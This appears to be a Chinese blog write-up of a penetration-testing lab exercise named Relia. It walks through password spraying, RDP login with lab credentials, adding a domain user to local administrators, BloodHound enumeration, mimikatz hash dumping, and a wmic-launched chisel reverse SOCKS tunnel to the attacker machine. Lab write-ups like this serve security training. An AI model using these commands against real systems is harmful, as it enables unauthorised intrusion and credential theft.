Challenge 2 - Relia(7)

 Challenge 2 - Relia(7)

下一台回到面對外網的 .191 機器,如下表



上一章在內網的 172.16.xxx.14 機器上發現 Keepass 的資料庫 Database.kdbx

從中獲取到一個帳號密碼 dmzadmin:SlimGodhoodMope

透過 crackmapexec 密碼噴灑發現這個憑證是 .191 的有效憑證,本機帳號不是網域帳號



進行 Rustscan 看看 .191 有開哪些對外的 Port,可以看到有 3389



hydra 測試 .191 RDP 發現該組憑證是可以透過 RDP 登入的



RDP 登入,└─$ xfreerdp /u:dmzadmin /p:SlimGodhoodMope /v:192.168.212.191 -drive:lab2,/home/kali/lab2/191,桌面上就有 flag proof.txt,這一台沒有 local.txt



看了一下這個帳號隸屬 .191 Administrators 群組,但 crackmapexec 測試時沒有顯示



下一步將網域帳號 jim@relia.com:Castello1! 加到 .191 的本機管理者群組



然後改使用網域帳號 jim RDP 登入到 .191,└─$ xfreerdp /u:jim@relia.com /p:'Castello1!' /v:192.168.212.191 -drive:lab2,/home/kali/lab2/191

whoami 看一下確認是 relia\jim 的帳號登入,ipconfig 發現這一台有兩張網卡,電腦名稱 login



更新攻擊順序表並將雙網卡資訊紀錄上去,這一台看來充當內網對外的 Router



拿下有加入網域的機器接著跑 BloodHound 是基本的枚舉,上一章拿下內網的 .14 沒有跑

是因為提權沒有成功(但是沒有影響),加上內網要傳檔案較麻煩要搭建 chisel

所以將 BloodHound 放到 .191 來跑,將相關工具上傳然後執行 Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\jim\Desktop\ -OutputPrefix "relia"



執行 BloodHound 後先查一下 Domain Admins 有三個,dan、internaladmin、administrator



將使用者帳號 jim,電腦帳號 login Mark 成 Owned 繼續查看相關攻擊路徑,但沒有新發現



現有使用者 jim 是個一般使用者沒有甚麼特殊權限



開始先將內網的機器與資訊收集完整

.6 --> DC02

.7 --> INTRANET

.15 --> WK02



.21 --> FILES

.30 --> WEBBY

.189 --> MAIL



.19 & .20 依據 TTL 看來是 Linux,且沒有名稱解析



先將攻擊順序表更新如下



在 .191 繼續枚舉,mimikatz.exe 收集 dmzadmin HASH



.191 Administrator HASH



更新帳號密碼表



目前看來拿下 .191 後沒有特別的進一步資訊,最後搭建 chisel 回到 kali

然後繼續網內網其他機器查看,這一章到此告一段落

wmic process call create "C:\users\jim\desktop\chisel.exe client 192.168.45.221:8080 R:socks"



留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)